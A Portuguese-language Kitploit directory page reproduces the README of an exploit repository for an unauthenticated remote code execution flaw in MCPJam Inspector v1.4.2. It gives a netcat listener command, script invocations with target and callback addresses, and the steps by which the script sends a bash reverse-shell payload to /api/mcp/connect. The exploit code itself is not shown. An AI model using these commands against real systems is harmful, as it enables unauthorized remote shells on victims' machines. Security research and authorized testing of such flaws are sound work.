Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23744-RCE — Esta utilidade foi criada durante pesquisa envolvendo o MCPJam v1.4.2. A aplicação expõe um endpoint de API que aceita um objeto de configuração do servidor. Sob certas condições, validação insuficiente pode permitir execução não intencional de comandos. | Kitploit
Ferramentas/GitHubGitHub/alisster00/cve-2026-23744-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

Esta utilidade foi criada durante pesquisa envolvendo o MCPJam v1.4.2. A aplicação expõe um endpoint de API que aceita um objeto de configuração do servidor. Sob certas condições, validação insuficiente pode permitir execução não intencional de comandos.

Ver Repositório
11há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

MCPJam Inspector v1.4.2 - Exploit de RCE

Descrição da Vulnerabilidade

O MCPJam Inspector contém uma vulnerabilidade de Execução Remota de Código (RCE) não autenticada no endpoint /api/mcp/connect. A vulnerabilidade permite que atacantes executem comandos arbitrários enviando um payload malicioso de configuração do servidor MCP.

O endpoint aceita um payload JSON com um objeto serverConfig contendo um command e um array args, que são executados diretamente no sistema sem validação ou sanitização adequadas.

Versões Afetadas

  • MCPJam Inspector v1.4.2 e provavelmente versões anteriores

Uso

Pré-requisitos

  • Python 3.6+
  • biblioteca requests: pip install requests
  • netcat ou socat para ouvinte
  • Início Rápido

    Terminal 1 - Iniciar Ouvinte:

    root@kitploit:~
    nc -lvnp 4444
    

    Terminal 2 - Executar Exploit:

    root@kitploit:~
    python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
    

    Exemplos

    root@kitploit:~
    # Padrão (porta 6274, porta de callback 4444)
    python3 script.py <TARGET_IP> -l <YOUR_IP>
    
    # Porta MCPJam personalizada
    python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
    
    # Porta do ouvinte personalizada
    python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
    

    Como Funciona

    1. O script verifica se o MCPJam está acessível no alvo
    2. Constrói um payload malicioso de servidor MCP com shell reverso em bash
    3. Envia o payload para o endpoint /api/mcp/connect
    4. O MCPJam processa o comando e inicia o callback do shell reverso
    5. O usuário recebe um shell interativo no ouvinte

    Aviso Legal

    ⚠️ AVISO LEGAL:

    Este exploit é fornecido apenas para fins educacionais e de teste de segurança autorizado. O acesso não autorizado a sistemas de computador é ilegal. Os usuários são os únicos responsáveis por:

    • Obter autorização adequada antes de testar qualquer sistema
    • Cumprir todas as leis e regulamentos aplicáveis
    • Quaisquer danos ou consequências legais decorrentes do uso indevido

    O autor não assume qualquer responsabilidade por uso indevido ou danos causados por esta ferramenta. Use por sua conta e risco.

    Detalhes Técnicos

    • Endpoint Vulnerável: /api/mcp/connect
    • Método: POST
    • Autenticação: Nenhuma necessária
    • Impacto: Execução Remota de Código não autenticada
    Baixar ferramenta